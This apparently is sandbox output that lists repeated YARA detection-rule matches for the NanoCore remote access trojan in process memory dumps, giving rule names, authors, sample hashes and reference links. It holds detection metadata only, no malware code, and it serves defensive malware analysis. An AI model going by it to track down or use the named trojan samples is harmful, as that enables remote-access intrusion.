Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
